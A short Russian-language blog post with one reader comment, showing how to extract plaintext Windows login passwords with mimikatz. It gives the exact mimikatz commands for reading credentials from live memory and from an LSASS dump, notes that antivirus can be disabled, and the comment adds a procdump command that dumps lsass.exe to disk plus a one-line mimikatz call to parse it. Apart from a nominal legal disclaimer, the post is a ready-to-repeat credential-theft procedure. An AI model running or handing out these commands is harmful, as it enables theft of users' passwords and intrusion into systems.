Приватность пользователей, нет не слышал…
Скажу сразу руководством данная статья не пахнет. Я просто хочу показать что безопасности как такой НЕТ. И так, сегодня мы будет узнавать пароли всех пользователей, которые зарегистрированы в системе. Повторять вы можете, но на свой страх и риск, а главное руководствоваться УК РФ и помнить что ответственность за эксперимент лежит на Вас самих. И так поехали…
Есть программа mimikatz, которая позволяет «изымать» пароли из активных пользователей зарегистрированных в системе. Программа проста в управлении и кто хочет ее подробно изучить, то это уже будет — самостоятельные занятия. Расскажу вкратце:
Запускаем программу, вводим две команды:
privilege::debug
sekurlsa::logonPasswords full
и получаем список активных пользователей и их пароли:
На скриншоте я закрасил информацию полученную, но могу сказать что определяет все правильно и точно. Пароли из windows 7 и windows 2008 server кушает на ура!
А теперь как получить дамп памяти с удаленной машины:
Кладем дамп рядом с программой и вводим следующие команды:
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords
А теперь о главном — безопастности как таковой нет. В инете поговаривают, что мол на серверных не пашет, проверил еще как работает. Это печально… Хорошо, хоть антивирус ее определяет как вирус, но защиты от дампа памяти снятого и от этой программы нет, так как антивирус всегда можно отключить, а дамп снять легко и просто…
Грустно………………………………
Один комментарий
petrov.ivan
procdump.exe -accepteula -ma lsass.exe c:\windows\temp\lsass.dmp 2>&1
mimikatz.exe log «sekurlsa::minidump lsass.dmp» sekurlsa::logonPasswords exit
Подробнее: https://www.securitylab.ru/analytics/454682.php